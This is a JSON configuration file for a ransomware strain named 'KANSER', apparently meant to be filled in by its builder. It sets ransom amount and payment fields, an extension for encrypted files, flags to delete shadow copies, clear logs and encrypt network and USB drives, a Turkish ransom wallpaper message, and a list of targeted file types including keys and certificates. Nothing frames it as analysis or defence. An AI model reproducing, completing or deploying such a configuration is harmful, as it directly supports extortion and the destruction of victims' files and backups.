{
  "_comment": "KANSER RANSOMWARE CONFIG — Builder tarafindan doldurulur",
  "bitcoin_address": "",
  "monero_address": "",
  "amount_usd": 500,
  "contact_email": "",
  "extension": ".KRSN",
  "threads": 8,
  "max_file_size_mb": 50,
  "delete_shadows": true,
  "clear_logs": true,
  "encrypt_network": true,
  "encrypt_usb": true,
  "wallpaper_text": "DOSYALARINIZ SIFRELENDI! HOW_TO_DECRYPT.txt dosyasini okuyun.",
  "extensions": [
    ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".csv",
    ".jpg", ".jpeg", ".png", ".gif", ".bmp", ".psd", ".ai",
    ".mp3", ".mp4", ".avi", ".mkv", ".mov", ".wmv",
    ".zip", ".rar", ".7z", ".tar", ".gz",
    ".html", ".php", ".js", ".py", ".java", ".cpp",
    ".sql", ".db", ".sqlite", ".mdb",
    ".pem", ".key", ".crt", ".ovpn",
    ".json", ".xml", ".config", ".conf", ".yml", ".yaml"
  ]
}
